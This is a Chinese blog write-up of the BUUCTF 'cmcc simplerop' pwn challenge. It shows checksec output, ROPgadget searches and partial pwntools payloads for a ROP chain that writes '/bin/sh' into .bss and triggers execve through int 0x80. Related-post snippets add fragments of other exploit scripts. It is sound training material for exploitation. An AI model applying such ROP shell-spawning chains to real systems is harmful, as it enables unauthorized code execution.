cmcc Simplerop

最新推荐文章于 2024-07-24 09:45:22 发布
最新推荐文章于 2024-07-24 09:45:22 发布
阅读量3.9k 收藏 1
点赞数 1
分类专栏: pwn题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/123547177
版权

题目来源

1. 安全策略

[*] '/root/ctf/buuctf/pwn/simplerop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

2. 分析

程序的功能很简单,接收一段用户的输入,向大小为32的栈中最多可以写入100个字节的数据。是很明显的rop的题目。

ret2libc

首先可以考虑ret2libc的方式。但是这题没有got和plt表,这里我没有找到方法去泄露libc地址,因此放弃了这种方式

方法一 execve

然后考虑execve("/bin/sh",0,0)的方式获取shell。

  • 利用ropgadget寻找gadget
    root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "int"
Gadgets information
============================================================
0x080493e1 : int 0x80

Unique gadgets found: 1

root@kali:~/ctf/buuctf/pwn# ROPgadget --binary simplerop --only "pop|ret" | grep eax
0x0809da8a : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bae06 : pop eax ; ret
0x08071e3a : pop eax ; ret 0x80e
0x0809da89 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
    因此的话可以构造出来payload来出发0xb系统调用
    exevce = p32(pop_eax_ret) + p32(0xb) + p32(int_80)
payload = p32(pop_edx_ecx_eax_ret) + p32(0) + p32(0) + p32(binsh) + execve
  • 继续分析发现程序中找不到binsh字符串,因此考虑利用read函数将/bin/sh写入到bss段中。
    # read(0, binsh, 0x8)
read = 0x0806cd50
binsh = 0x080eaf80
payload = p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
  • 合并上面两个payload
    payload = cyclic(32)
payload += p32(read) + p32(retn) + p32(0) + p32(binsh) + p32(0x8)
payload += p32(pop_edx_ecx_eax_ret)
最低0.47元/天 解锁文章
Morphy_Amo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CMCC--simplerop 题解
lifanxin的博客
03-28 1583
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
cmcc simplerop
pondzhang的专栏
05-25 223
from pwn import * p = process('./simplerop') p.recv() int80_addr = 0x080493e1 pop_eax = 0x080bae06 read = 0x0806CD50 binsh = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850 payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8) payl
cmcc_simplerop
、moddemod
07-03 254
关于mprotect可参考mprotect 静态链接的可执行文件,利用mprotect修改bss可执行,写入shellcode后跳转即拿到shell… from pwn import * context.log_level = 'debug' proc_name = './simplerop' p = process(proc_name) # p = remote('node3.buuoj.cn', 25491) ..
BUUCTF cmcc_simplerop
qq_51821131的博客
10-05 1869
cmcc_simplerop 由于网络安全课程需要,从本篇开始记录BUU的做题记录及wp 常规操作,拿到文件先检查,保护开得不多 ida查看,存在明显溢出,并且提示要使用ROP 利用pwndbg得到偏移量为0x20 找到了系统调用int 0x80 整理下思路,可以利用mprotect修改bss的权限,并生成shellcode,利用read函数往bss段写入shellcode并且执行,从而拿到shell from pwn import * p=remote('node4.buuoj.cn',29914
buuctf cmcc_simplerop
qq_42728977的博客
04-11 291
系统调用+rop https://www.cnblogs.com/bhxdn/p/12330142.html https://blog.csdn.net/xiaominthere/article/details/17287965
cmcc_simplerop的wp
wuyvle的博客
03-06 348
函数很多很唬人 但确实不难,很明显要溢出 用ROP看看有没有int80 有,我们可以利用系统调用 再用ROp找找看 就这俩了 int80(11,"/bin/sh",null,null) 后面的四个参数分别是eax、ebx、ecx、edx。 所以上面的两条命令刚刚好。 没有/bin/sh就用read在bss段上写一个 1 from pwn import * 2 3 p = process('./simplerop') 4 context.log_level = 'debug' 5 6 p
【pwn】 cmcc_simplerop
Nothing
02-26 729
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 486
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 790
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.csdn.net/A951860555/article/details/115286266
CMCC客户端
05-15
"CMCC客户端"是一款专为中国移动用户设计的无线网络连接工具,主要功能是帮助用户方便快捷地接入CMCC(China Mobile Communications Corporation,中国移动)提供的Wi-Fi网络服务。这款客户端简化了传统的Wi-Fi连接...
cmcc客户端
11-20
"cmcc客户端"是一款专为中国移动的无线网络(CMCC)设计的软件,它使得用户无需通过网页登录的方式来接入和使用CMCC的Wi-Fi服务。这个客户端简化了连接过程,提高了用户使用的便捷性,尤其在公共场合如机场、火车站...
cmcc-LTE题库
10-19
cmccLTE考试题库,基本涵盖CMCC各类认证考试知识框架,经过整理分类便于学习
网络战时代的国家安全:策略、技术和国际合作
最新发布
2301_79955948的博客
07-24 1289
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1372
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 570
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1532
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
CMCC LTE外场测试指南:注意事项与操作详解
本资源是一份关于CMCC LTE Single USIM Dual Standby Handset的外场测试操作指南,由HuiyueWCX公司内部使用。该文档详细地涵盖了在实际测试过程中应注意的关键事项和所需设备的操作步骤。主要分为三个部分: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值